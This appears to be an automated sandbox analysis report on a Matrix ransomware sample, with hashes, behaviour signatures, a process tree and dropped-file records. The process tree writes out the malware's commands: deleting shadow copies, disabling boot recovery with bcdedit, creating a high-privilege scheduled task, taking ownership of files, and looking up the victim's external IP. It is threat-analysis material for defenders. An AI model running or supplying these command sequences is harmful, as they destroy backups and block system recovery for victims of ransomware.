Analysis

  • max time kernel
    150s
  • max time network
    44s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    28-12-2022 18:35

General

  • Target

    2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe

  • Size

    1.2MB

  • MD5

    6411153c8a95e8c77127d99c75595604

  • SHA1

    02e6b8baed744a6b0c78baddf1720654688e5642

  • SHA256

    2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3

  • SHA512

    65f8479bb477d76af915811b44a06bc4ca076955d22e6d3cdc336f6e3c7d7299ef52da81aa3d13f6f5f9170ba5b9ac049fe67edc1df0a8899e8a4b7b03a82ade

  • SSDEEP

    24576:+/SA+2lraRrjSJR5ezmT1dM9fB3NIDreFqO:yXlCIfe

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://myexternalip.com/raw

Signatures

  • Matrix Ransomware 64 IoCs

    Targeted ransomware with information collection and encryption functionality.

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 3 IoCs
  • Modifies extensions of user files 3 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Sets service image path in registry 2 TTPs 1 IoCs
  • UPX packed file 4 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Loads dropped DLL 4 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Drops desktop.ini file(s) 42 IoCs
  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 46 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
    "C:\Users\Admin\AppData\Local\Temp\2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe"
    1⤵
    • Matrix Ransomware
    • Modifies extensions of user files
    • Loads dropped DLL
    • Drops desktop.ini file(s)
    • Enumerates connected drives
    • Drops file in Program Files directory
    • Suspicious use of WriteProcessMemory
    PID:1424
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe" "C:\Users\Admin\AppData\Local\Temp\NWb6U328.exe"
      2⤵
        PID:1204
      • C:\Users\Admin\AppData\Local\Temp\NWb6U328.exe
        "C:\Users\Admin\AppData\Local\Temp\NWb6U328.exe" -n
        2⤵
        • Executes dropped EXE
        PID:904
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /C powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')">"C:\Users\Admin\AppData\Local\Temp\FfRHK9B8.txt"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1816
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')"
          3⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1792
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\WVwHJllM.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1404
        • C:\Windows\SysWOW64\reg.exe
          reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\WVwHJllM.bmp" /f
          3⤵
          • Sets desktop wallpaper using registry
          PID:1020
        • C:\Windows\SysWOW64\reg.exe
          reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f
          3⤵
            PID:1556
          • C:\Windows\SysWOW64\reg.exe
            reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
            3⤵
              PID:1748
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\w9SzCseH.vbs"
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:1192
            • C:\Windows\SysWOW64\wscript.exe
              wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\w9SzCseH.vbs"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:972
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\MCOOq9KH.bat" /sc minute /mo 5 /RL HIGHEST /F
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:520
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\MCOOq9KH.bat" /sc minute /mo 5 /RL HIGHEST /F
                  5⤵
                  • Creates scheduled task(s)
                  PID:800
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:1204
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /Run /I /tn DSHCA
                  5⤵
                    PID:1476
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c ""C:\Users\Admin\AppData\Local\Temp\hwydVNNs.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf""
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:1084
              • C:\Windows\SysWOW64\attrib.exe
                attrib -R -A -S "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf"
                3⤵
                • Views/modifies file attributes
                PID:1784
              • C:\Windows\SysWOW64\cacls.exe
                cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf" /E /G Admin:F /C
                3⤵
                  PID:1564
                • C:\Windows\SysWOW64\takeown.exe
                  takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf"
                  3⤵
                  • Modifies file permissions
                  PID:1556
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c XPo38R1T.exe -accepteula "StandardBusiness.pdf" -nobanner
                  3⤵
                  • Loads dropped DLL
                  PID:1368
                  • C:\Users\Admin\AppData\Local\Temp\XPo38R1T.exe
                    XPo38R1T.exe -accepteula "StandardBusiness.pdf" -nobanner
                    4⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    PID:996
                    • C:\Users\Admin\AppData\Local\Temp\XPo38R1T64.exe
                      XPo38R1T.exe -accepteula "StandardBusiness.pdf" -nobanner
                      5⤵
                      • Drops file in Drivers directory
                      • Executes dropped EXE
                      • Sets service image path in registry
                      • Enumerates connected drives
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious behavior: LoadsDriver
                      • Suspicious use of AdjustPrivilegeToken
                      PID:772
            • C:\Windows\system32\taskeng.exe
              taskeng.exe {8A0D1CCF-6210-429B-A2BC-0E22698C74A5} S-1-5-21-999675638-2867687379-27515722-1000:ORXGKKZC\Admin:Interactive:[1]
              1⤵
                PID:2012
                • C:\Windows\SYSTEM32\cmd.exe
                  C:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\MCOOq9KH.bat"
                  2⤵
                    PID:1748
                    • C:\Windows\system32\vssadmin.exe
                      vssadmin Delete Shadows /All /Quiet
                      3⤵
                      • Interacts with shadow copies
                      PID:1608
                    • C:\Windows\System32\Wbem\WMIC.exe
                      wmic SHADOWCOPY DELETE
                      3⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1784
                    • C:\Windows\system32\bcdedit.exe
                      bcdedit /set {default} recoveryenabled No
                      3⤵
                      • Modifies boot configuration data using bcdedit
                      PID:1188
                    • C:\Windows\system32\bcdedit.exe
                      bcdedit /set {default} bootstatuspolicy ignoreallfailures
                      3⤵
                      • Modifies boot configuration data using bcdedit
                      PID:1540
                    • C:\Windows\system32\schtasks.exe
                      SCHTASKS /Delete /TN DSHCA /F
                      3⤵
                        PID:1692
                  • C:\Windows\system32\vssvc.exe
                    C:\Windows\system32\vssvc.exe
                    1⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1744

                  Network

                  MITRE ATT&CK Enterprise v6

                  Replay Monitor

                  Loading Replay Monitor...

                  Downloads

                  • C:\$Recycle.Bin\S-1-5-21-999675638-2867687379-27515722-1000\desktop.ini

                    Filesize

                    1KB

                    MD5

                    d16f0e859a4b8d7b427fc016af701c55

                    SHA1

                    015be63c10a84a52b38848098f307a8bf351b7d1

                    SHA256

                    8d771303d1ce51fcd3a0c4ddfb553524d558e54660f44bc976017a02f5ba52d6

                    SHA512

                    374f12d82e4d9d2b0d09a54b8addcfa8ec59db34adb4880179225f516afc4518f99385111b43546c85946ce65240292e9a32ce01bf5a7ef2c612452bfde31672

                  • C:\Users\Admin\AppData\Local\Temp\FfRHK9B8.txt

                    Filesize

                    14B

                    MD5

                    8eb51985066cb0782077f624013d47a2

                    SHA1

                    0549d07d51454e73b937946ba1887cacfce71835

                    SHA256

                    5537d10911f09132033b185344f75ea1a0ed7e5509b3be00bd8bc93d477baa44

                    SHA512

                    539a7160bb41366a74d8859b080724f5838132428f672c2bba7ef9c9a259823f15074adec75567bea6724f09d681c04b8763a2f495eff3436ff17420cb7bf0f5

                  • C:\Users\Admin\AppData\Local\Temp\NWb6U328.exe

                    Filesize

                    1.2MB

                    MD5

                    6411153c8a95e8c77127d99c75595604

                    SHA1

                    02e6b8baed744a6b0c78baddf1720654688e5642

                    SHA256

                    2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3

                    SHA512

                    65f8479bb477d76af915811b44a06bc4ca076955d22e6d3cdc336f6e3c7d7299ef52da81aa3d13f6f5f9170ba5b9ac049fe67edc1df0a8899e8a4b7b03a82ade

                  • C:\Users\Admin\AppData\Local\Temp\NWb6U328.exe

                    Filesize

                    1.2MB

                    MD5

                    6411153c8a95e8c77127d99c75595604

                    SHA1

                    02e6b8baed744a6b0c78baddf1720654688e5642

                    SHA256

                    2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3

                    SHA512

                    65f8479bb477d76af915811b44a06bc4ca076955d22e6d3cdc336f6e3c7d7299ef52da81aa3d13f6f5f9170ba5b9ac049fe67edc1df0a8899e8a4b7b03a82ade

                  • C:\Users\Admin\AppData\Local\Temp\XPo38R1T.exe

                    Filesize

                    181KB

                    MD5

                    2f5b509929165fc13ceab9393c3b911d

                    SHA1

                    b016316132a6a277c5d8a4d7f3d6e2c769984052

                    SHA256

                    0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

                    SHA512

                    c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

                  • C:\Users\Admin\AppData\Local\Temp\XPo38R1T.exe

                    Filesize

                    181KB

                    MD5

                    2f5b509929165fc13ceab9393c3b911d

                    SHA1

                    b016316132a6a277c5d8a4d7f3d6e2c769984052

                    SHA256

                    0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

                    SHA512

                    c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

                  • C:\Users\Admin\AppData\Local\Temp\XPo38R1T64.exe

                    Filesize

                    221KB

                    MD5

                    3026bc2448763d5a9862d864b97288ff

                    SHA1

                    7d93a18713ece2e7b93e453739ffd7ad0c646e9e

                    SHA256

                    7adb21c00d3cc9a1ef081484b58b68f218d7c84a720e16e113943b9f4694d8ec

                    SHA512

                    d4afd534ed1818f8dc157d754b078e3d2fe4fb6a24ed62d4b30b3a93ebc671d1707cedb3c23473bf3b5aa568901a1e5183da49e41152e352ecfa41bf220ebde6

                  • C:\Users\Admin\AppData\Local\Temp\hwydVNNs.bat

                    Filesize

                    246B

                    MD5

                    c6f651a9c6fbad629b34f2831a19f0f8

                    SHA1

                    14083d371e08dc21478203cf866502989d0cc0d9

                    SHA256

                    657a345b45277e8a7990e2fb04d4d4d5121beb057be45d0f377dfc473c7b4ead

                    SHA512

                    5d7c251574f72dc3d5b6684d476fa3f9fbd1755feadd79c34195760701c906c16e7bb7cabc959cec96bab09b72b17ec2391cb162d6425fc0c717a20f343bd686

                  • C:\Users\Admin\AppData\Roaming\MCOOq9KH.bat

                    Filesize

                    265B

                    MD5

                    cf9a3b0a800a06c7f55d613ccb09a225

                    SHA1

                    98a5053e45981d99fb2fe0c0cfdaaa59585f62c6

                    SHA256

                    215458f32f2ab57c39871a6ba6f6cfa01006b01cb1b1af4434933caf0e6ae3be

                    SHA512

                    6dbacbb5bf202139fa9859eed49c541a9ad0ff8a756fced9d7c9b7cc601fcd8ca9b8391537ee441f82d7865d3818bc6db632ecffe3b01f6abb29430ce106fd6e

                  • C:\Users\Admin\AppData\Roaming\w9SzCseH.vbs

                    Filesize

                    260B

                    MD5

                    f18196ef66c0d59fb0531eba14dca100

                    SHA1

                    56666a9d0bf32e0d94ccbc4f2687f0d207accb20

                    SHA256

                    732af3f105bdffe441ea59f66bda7f1d61c2eaa60d477958e8d66137d592a7c1

                    SHA512

                    0210a02c6b67768e3dfd2da47b308a7a100a3d553739ee49d84a78aa9d7516e21f95d662ffea75c19cd53a707b873ee2f09ea02eb90ee94980870852a6b314dc

                  • \Users\Admin\AppData\Local\Temp\NWb6U328.exe

                    Filesize

                    1.2MB

                    MD5

                    6411153c8a95e8c77127d99c75595604

                    SHA1

                    02e6b8baed744a6b0c78baddf1720654688e5642

                    SHA256

                    2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3

                    SHA512

                    65f8479bb477d76af915811b44a06bc4ca076955d22e6d3cdc336f6e3c7d7299ef52da81aa3d13f6f5f9170ba5b9ac049fe67edc1df0a8899e8a4b7b03a82ade

                  • \Users\Admin\AppData\Local\Temp\NWb6U328.exe

                    Filesize

                    1.2MB

                    MD5

                    6411153c8a95e8c77127d99c75595604

                    SHA1

                    02e6b8baed744a6b0c78baddf1720654688e5642

                    SHA256

                    2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3

                    SHA512

                    65f8479bb477d76af915811b44a06bc4ca076955d22e6d3cdc336f6e3c7d7299ef52da81aa3d13f6f5f9170ba5b9ac049fe67edc1df0a8899e8a4b7b03a82ade

                  • \Users\Admin\AppData\Local\Temp\XPo38R1T.exe

                    Filesize

                    181KB

                    MD5

                    2f5b509929165fc13ceab9393c3b911d

                    SHA1

                    b016316132a6a277c5d8a4d7f3d6e2c769984052

                    SHA256

                    0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

                    SHA512

                    c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

                  • \Users\Admin\AppData\Local\Temp\XPo38R1T64.exe

                    Filesize

                    221KB

                    MD5

                    3026bc2448763d5a9862d864b97288ff

                    SHA1

                    7d93a18713ece2e7b93e453739ffd7ad0c646e9e

                    SHA256

                    7adb21c00d3cc9a1ef081484b58b68f218d7c84a720e16e113943b9f4694d8ec

                    SHA512

                    d4afd534ed1818f8dc157d754b078e3d2fe4fb6a24ed62d4b30b3a93ebc671d1707cedb3c23473bf3b5aa568901a1e5183da49e41152e352ecfa41bf220ebde6

                  • memory/520-76-0x0000000000000000-mapping.dmp

                  • memory/772-94-0x0000000000000000-mapping.dmp

                  • memory/800-77-0x0000000000000000-mapping.dmp

                  • memory/904-59-0x0000000000000000-mapping.dmp

                  • memory/972-71-0x0000000000000000-mapping.dmp

                  • memory/996-95-0x0000000000400000-0x0000000000477000-memory.dmp

                    Filesize

                    476KB

                  • memory/996-89-0x0000000000000000-mapping.dmp

                  • memory/1020-70-0x0000000000000000-mapping.dmp

                  • memory/1084-80-0x0000000000000000-mapping.dmp

                  • memory/1188-102-0x0000000000000000-mapping.dmp

                  • memory/1192-69-0x0000000000000000-mapping.dmp

                  • memory/1204-78-0x0000000000000000-mapping.dmp

                  • memory/1204-55-0x0000000000000000-mapping.dmp

                  • memory/1368-92-0x0000000000400000-0x0000000000477000-memory.dmp

                    Filesize

                    476KB

                  • memory/1368-98-0x0000000000400000-0x0000000000477000-memory.dmp

                    Filesize

                    476KB

                  • memory/1368-86-0x0000000000000000-mapping.dmp

                  • memory/1404-68-0x0000000000000000-mapping.dmp

                  • memory/1424-54-0x0000000076151000-0x0000000076153000-memory.dmp

                    Filesize

                    8KB

                  • memory/1476-79-0x0000000000000000-mapping.dmp

                  • memory/1540-103-0x0000000000000000-mapping.dmp

                  • memory/1556-84-0x0000000000000000-mapping.dmp

                  • memory/1556-72-0x0000000000000000-mapping.dmp

                  • memory/1564-83-0x0000000000000000-mapping.dmp

                  • memory/1608-100-0x0000000000000000-mapping.dmp

                  • memory/1692-104-0x0000000000000000-mapping.dmp

                  • memory/1748-73-0x0000000000000000-mapping.dmp

                  • memory/1748-85-0x0000000000000000-mapping.dmp

                  • memory/1784-101-0x0000000000000000-mapping.dmp

                  • memory/1784-82-0x0000000000000000-mapping.dmp

                  • memory/1792-63-0x0000000000000000-mapping.dmp

                  • memory/1792-65-0x0000000073580000-0x0000000073B2B000-memory.dmp

                    Filesize

                    5.7MB

                  • memory/1792-66-0x0000000073580000-0x0000000073B2B000-memory.dmp

                    Filesize

                    5.7MB

                  • memory/1816-62-0x0000000000000000-mapping.dmp